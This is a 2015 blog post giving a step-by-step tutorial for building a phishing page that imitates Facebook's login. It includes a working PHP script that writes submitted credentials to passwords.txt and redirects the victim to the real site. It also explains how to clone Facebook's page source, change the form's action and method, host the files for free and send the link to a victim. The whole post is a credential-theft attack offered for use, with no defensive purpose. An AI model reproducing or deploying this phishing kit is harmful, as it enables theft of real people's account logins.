Tuesday, 8 September 2015

create a phishinng page (fake login page) for facebook

  No comments
STEP 1:Creating Phishing.php file :

1. Even if you don't have any knowledge of php file simply copy the following script and save it as phishing.php .

:<?php
header("Location: https://www.facebook.com/login.php");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

STEP 2: Creating index.html page :

1. Open the Facebook login page then, Right click>View page source and paste it in notepad and save it a
index.html

2. Open that index.html file with a Notepad and search (By pressing Ctrl+F) for : action in it and replace the highlighted part (as in the following screenshot) with phishing.php .



3. search (By pressing Ctrl+F) for : method in it and replace the highlighted part (post) with get .


4. save index.html


STEP 3: Now create a completely blank text file with name passwords.txt.

Now you have all the following three files with you :
1. PHISHING.php
2. index.html
3. passwords.txt


Step 4: Now you need to make awebsite.

I recommended you byethost because it is completely free hosting with freedomain.

Go to: byethost.com  and FILL OUT the informations needed and click on register button.

now register your account and upload all the three files and host them all
then send the link of the fake page you have created
and send it to your victim
and when victim login you will recieve username and password of the victim in the passwords.txt file.

done..
stay updates for more updates... thanks

No comments :

Post a Comment